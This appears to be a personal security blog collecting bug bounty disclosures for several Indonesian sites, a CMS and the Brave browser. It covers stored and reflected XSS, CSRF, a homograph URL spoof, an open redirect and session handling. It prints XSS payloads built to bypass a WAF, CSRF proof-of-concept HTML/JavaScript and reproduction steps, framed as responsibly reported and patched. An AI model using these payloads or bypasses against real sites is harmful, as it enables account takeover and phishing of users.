Bypass Stored XSS on User Edit [ ]


I’ve found Stored XSS on user edit in name field, actually have WAF to protect it, but i found some payload to bypass it.

Detail : 

Location Of Bug :

Payload : 

"'--!><Script /K/>confirm(1)</Script /K/>#

Step To Reproduce :

  1. Login to your MatahariMall account
  2. Go to User Edit
  3. Add your name with Payload
  4. Save it

It will showing up the XSS and when you access another page, it also will showing up, because the name of your account will be displayed at another page.

Browser :

  1. Chrome And Firefox

Note :

Team of fix the bug after 1 day I send report, Wow!


Video :

Bypassing XSS

So, after them patching my previous report i going to bypass it, and i bypass it with new payload.

Payload : –!”><svg/onload=confirm(“1”)>

And it pop up the XSS,

it’s a many way to bypass the firewall.


Homograph Attack Bypass On Brave Browser

Hi guys, at this time i try to test Brave Browser , because i challenge myself to test something except website application and will see what i can do with it. While I search about Browser bug in I find report about Homograph attack in browser at 175286 and I try it, but its has been patched, so I find another way to attack it. And I try to read more reference about browser and i read URI Obfuscation  that give me idea how about adding @ when add punycode ? and boom. Its work, Brave Browser not validate a url properly like previous report. And This is My Report, but before i send report I check it on chrome, and the chrome response is showing the true URL.


At #175286 you has been patched, and i try it work, but i’ve another way to bypass it. when we add a site to our Homepage with @, it’s not validate a url properly, make sure it’s display the punycode.

Products affected:

Brave 0.18.36 ( Linux & Windows )

Steps To Reproduce:

  • In browser add homepage with IDN @ebа
  • Now close and open browser again
  • You can see it’s redirect to

Video :

And two days after that the Brave team update my report to triaged and give me bounty ( half of first reporter ) , but i not satisfied with that (Am I so greedy ) >.< , and ask information, why ? and Brave team said “this was awarded lower because it requires the URL to start with ‘@’ which users would probably notice since it looks odd” and i think its true, so i dig it again, how can I attack it without ‘@’ and I try different way to attack it, and I’ve found the ‘@’ not required on url, so just use URL like this ebа . And the Brave team said “seems valid” and give me extra bounty. Yay !


Missing CSRF Token On Add Admin [Popoji CMS]


This is happen because when request add admin there’s no CSRF token
Step To Reproduce :

<script>function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack"POST", "http://root/popoji/poadmin/
route.php?mod=user&act=addnew", true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
<button>Let's Rock</button>

1. Save code to .html
2. upload them to host
3. execute it.

Video :

Fix & Mitigation :

give token when request sensitive action.

them give me permission to disclose it, and they say the patch will deployed for next version. So, if you use popoji CMS, be careful, dont trust any link from unknown people and stay update your CMS. and also them give me bounty for this! yeey !

Session Not Expired When Password Has Been Changed []


When user change password from another platform, the previous platform still connect to account and still can edit the profile.


1. Login on mozilla,
2. Login on Chrome,
3. change the password on chrome.
4. back to mozilla, you still able to access the account
5. you still can edit profile.

Video : (unlisted )

Note : I ask permission to to write it on my blog, and them give me the permission, so I write here,

Hope you enjoy~

Open Redirect On

Description : 

Open redirects and forwards are possible when a web application accepts untrusted
input that could cause the web application to redirect the request to a URL contained within untrusted
input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a
phishing scam and steal user credentials. Because the server name in the modified link is identical to the

original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and
forward attacks can also be used to maliciously craft a URL that would pass the application’s access
control check and then forward the attacker to privileged functions that they would normally not be
able to access.

Impact :

Force user go to untrusted website from codepolitan website

Location of bug :

Payload :

Reproduce :

1. Open
2. Login, and you will be redirect to

Conclusion : 

Open redirect make user not safe because force user go to untrusted website ( scam
/phising) without user know

Video : 

Note :

Codepolitan crew its very fast on patch the bug, and them also will give me the SWAG and add my name on their hall of fame, yeay !

Credit :

Missing CSRF Token On Change Picture Request []


Actually i found many CSRF issue on tokopedia, but i just write this on my blog if you want to see all of them just go to my old blog :


This bug because when change picture there’s no CSRF token to cover it.

Vuln Request

POST /ajax/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 526
Cookie: <somecookie>
Connection: close

Poc Code:

      function getMe(){
        // retrieve page content
        var xhr = new XMLHttpRequest();

        // now execute the CSRF attack"POST", "", true);
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
<button onclick="getMe();">Let's Rock</button>

Note: file_path is another user photo

Step to reproduce:

  • Save Code .html
  • Click `Lets Rock`
  • Photo will be update with photo from file_path

Video :

XSS On Kaskus

This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.


This bug is unique, because XSS exposed when redirect to previous page after login.

Step To Reproduce

  • Go to
  • Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
  • Login with widget on top  and you will redirect
  • And XSS will be exposed

Http Header response : 


Video : 

Note :

Kaskus Response is very quick and i got SWAG from them.